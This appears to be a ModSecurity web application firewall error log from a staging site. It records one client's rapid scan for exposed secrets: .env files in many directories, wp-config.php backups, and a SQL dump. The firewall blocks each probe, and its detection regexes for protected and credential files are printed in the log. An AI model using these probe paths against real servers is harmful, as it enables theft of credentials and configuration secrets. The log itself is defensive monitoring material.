[Tue May 26 15:30:55.459670 2026] [security2:error] [pid 715645:tid 715828] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQZQAAADU"]
[Tue May 26 15:30:55.460686 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQYwAAADY"]
[Tue May 26 15:30:55.482080 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQbQAAAGw"]
[Tue May 26 15:30:55.508255 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQcAAAAGY"]
[Tue May 26 15:30:55.525175 2026] [security2:error] [pid 715645:tid 715868] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQcwAAAF0"]
[Tue May 26 15:30:55.547588 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQdAAAShQ"]
[Tue May 26 15:30:55.583964 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQdwAAAFE"]
[Tue May 26 15:30:55.598735 2026] [security2:error] [pid 715645:tid 715884] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQewAAAG0"]
[Tue May 26 15:30:55.598856 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQfQAAShU"]
[Tue May 26 15:30:55.604968 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQfgAAAHI"]
[Tue May 26 15:30:55.621037 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQhAAASiU"]
[Tue May 26 15:30:55.627152 2026] [security2:error] [pid 715645:tid 715896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQggAAAHk"]
[Tue May 26 15:30:55.629652 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQhgAAAFI"]
[Tue May 26 15:30:55.635313 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQiQAASmw"]
[Tue May 26 15:30:55.638234 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQiAAASh4"]
[Tue May 26 15:30:55.641364 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQigAAADg"]
[Tue May 26 15:30:55.655999 2026] [security2:error] [pid 715645:tid 715755] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/var/www/.env"] [unique_id "ahVvV3VGgMGh8k213RgQkgAASm0"]
[Tue May 26 15:30:55.665562 2026] [security2:error] [pid 715645:tid 715845] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQjwAAAEY"]
[Tue May 26 15:30:55.672645 2026] [security2:error] [pid 715645:tid 715675] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/var/www/html/.env"] [unique_id "ahVvV3VGgMGh8k213RgQkwAASh0"]
[Tue May 26 15:30:55.672880 2026] [security2:error] [pid 715645:tid 715861] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQkAAAAFY"]
[Tue May 26 15:30:55.675475 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQkQAASi4"]
[Tue May 26 15:30:55.737916 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQlAAAWSM"]
[Tue May 26 15:30:55.745326 2026] [security2:error] [pid 715645:tid 715684] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/web/.env"] [unique_id "ahVvV3VGgMGh8k213RgQmAAAWSY"]
[Tue May 26 15:30:55.782603 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQlwAAACg"]
[Tue May 26 15:30:55.802319 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQmQAAWRI"]
[Tue May 26 15:30:55.810814 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQmgAAWSs"]
[Tue May 26 15:30:55.822123 2026] [security2:error] [pid 715645:tid 715698] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/website/.env"] [unique_id "ahVvV3VGgMGh8k213RgQswAAWTQ"]
[Tue May 26 15:30:55.822728 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQmwAAWVs"]
[Tue May 26 15:30:55.831260 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQnAAAWVY"]
[Tue May 26 15:30:55.831485 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQnwAAWQU"]
[Tue May 26 15:30:55.839744 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQnQAAWVE"]
[Tue May 26 15:30:55.842863 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQqgAAAEk"]
[Tue May 26 15:30:55.848016 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQqwAAABw"]
[Tue May 26 15:30:55.866762 2026] [security2:error] [pid 715645:tid 715863] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQtgAAAFg"]
[Tue May 26 15:30:55.868577 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQsQAAWWQ"]
[Tue May 26 15:30:55.878550 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQuQAAABc"]
[Tue May 26 15:30:55.881736 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQugAAABo"]
[Tue May 26 15:30:55.891262 2026] [security2:error] [pid 715645:tid 715710] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php"] [unique_id "ahVvV3VGgMGh8k213RgQvgAAeEA"]
[Tue May 26 15:30:55.929684 2026] [security2:error] [pid 715645:tid 715665] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php.bak"] [unique_id "ahVvV3VGgMGh8k213RgQwAAAeBM"]
[Tue May 26 15:30:55.935880 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQvwAAAG4"]
[Tue May 26 15:30:55.950601 2026] [security2:error] [pid 715645:tid 715717] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php.new"] [unique_id "ahVvV3VGgMGh8k213RgQwQAAIUc"]
[Tue May 26 15:30:55.959084 2026] [security2:error] [pid 715645:tid 715699] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php.old"] [unique_id "ahVvV3VGgMGh8k213RgQwgAAcDU"]
[Tue May 26 15:30:55.969877 2026] [security2:error] [pid 715645:tid 715682] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVvV3VGgMGh8k213RgQxAAAQyQ"]
[Tue May 26 15:30:56.024510 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQwwAAQy0"]
[Tue May 26 15:30:56.038785 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQxgAAQw8"]
[Tue May 26 15:30:56.046891 2026] [security2:error] [pid 715645:tid 715780] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQyQAAAAU"]
[Tue May 26 15:30:56.141433 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:41628] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env"] [unique_id "ahVvWHVGgMGh8k213RgQzAAAADY"]
[Tue May 26 15:30:56.180531 2026] [security2:error] [pid 715645:tid 715868] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backend/.env"] [unique_id "ahVvWHVGgMGh8k213RgQ1AAAAF0"]
[Tue May 26 15:30:56.254091 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:41678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.staging.unsobered.com"] [uri "/*update.cgi*"] [unique_id "ahVvWHVGgMGh8k213RgQ4AAAAHQ"]
[Tue May 26 15:30:56.284347 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ3wAAAHI"]
[Tue May 26 15:30:56.305190 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:41680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ4QAAAFc"]
[Tue May 26 15:30:56.338608 2026] [security2:error] [pid 715645:tid 715845] [client 195.178.110.199:41694] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVvWHVGgMGh8k213RgQ7wAAAEY"]
[Tue May 26 15:30:56.345953 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ5wAAADA"]
[Tue May 26 15:30:56.371841 2026] [security2:error] [pid 715645:tid 715784] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ7QAAAAk"]
[Tue May 26 15:30:56.371993 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ7AAAAAs"]
[Tue May 26 15:30:56.378572 2026] [security2:error] [pid 715645:tid 715901] [client 195.178.110.199:41660] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ7gAAAH4"]
[Tue May 26 15:30:56.388665 2026] [security2:error] [pid 715645:tid 715897] [client 195.178.110.199:41656] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ8AAAAHo"]
[Tue May 26 15:30:56.449530 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ8wAAAEo"]
[Tue May 26 15:30:56.451460 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:41680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env"] [unique_id "ahVvWHVGgMGh8k213RgQ9wAAACw"]
[Tue May 26 15:30:56.512781 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgQ_AAAADk"]
[Tue May 26 15:30:56.542514 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:41656] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.backup"] [unique_id "ahVvWHVGgMGh8k213RgRBgAAAD8"]
[Tue May 26 15:30:56.582698 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:41674] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.bak"] [unique_id "ahVvWHVGgMGh8k213RgRCQAAAFw"]
